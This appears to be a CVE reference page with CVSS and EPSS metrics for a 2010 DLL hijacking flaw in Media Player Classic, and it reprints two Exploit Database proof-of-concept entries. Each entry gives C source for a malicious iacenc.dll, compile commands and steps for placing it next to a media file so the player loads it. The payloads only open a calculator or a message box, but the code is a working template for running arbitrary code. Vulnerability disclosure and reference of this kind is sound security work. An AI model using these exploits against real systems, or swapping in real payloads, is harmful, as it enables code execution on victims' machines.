Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
9.3 |
|
AV:N/AC:M/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 14765
Publication date : 2010-08-24 22h00 +00:00
Author : Encrypt3d.M!nd
EDB Verified : No
/*
Mediaplayer Classic 1.3.2189.0 Dll Hijack Exploit
By: Encrypt3d.M!nd
Date: 25\8\2010
Download: http://mpc-hc.sourceforge.net/
Details:
Compile the following code and rename it to iacenc.dll
and place file with one of the affected types in the same directory of the dll
Affected types: m2ts, m2t, flv, hdmov, 3gpp,3gp, mpeg, mp4v, mkv, m2v,rm , ram
(i guess all file types that mpc supports are affected)
Code :(used the one from this advisory:http://www.exploit-db.com/exploits/14758/):
*/
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void hook_startup() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14765.zip (mpc-poc.zip)
Exploit Database EDB-ID : 14788
Publication date : 2010-08-24 22h00 +00:00
Author : LiquidWorm
EDB Verified : Yes
/*
Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit
Vendor: Gabest
Product Web Page: http://sourceforge.net/projects/guliverkli
Affected Version: 6.4.9.1 (revision 73)
Summary: Media Player Classic (MPC) is a compact media player for
32-bit Microsoft Windows. The application mimics the look and feel
of the old, lightweight Windows Media Player 6.4 but integrates
most options and features found in modern media players. It and
its forks are standard media players in the K-Lite Codec Pack and
the Combined Community Codec Pack.
Desc: Media Player Classic suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level. The vulnerable extensions are .mka, .ra and .ram thru iacenc.dll
library.
----
gcc -shared -o iacenc.dll mplayerc.c
Compile and rename to iacenc.dll, create a file test.mka or any of the
above vulnerable extensions and put both files in same dir and execute.
----
Tested on Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
25.08.2010
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
Products Mentioned
Configuraton 0
Microsoft>>Windows_media_player >> Version *
Microsoft>>Windows_xp >> Version *
Configuraton 0
Bsplayer>>Bs.player >> Version *
References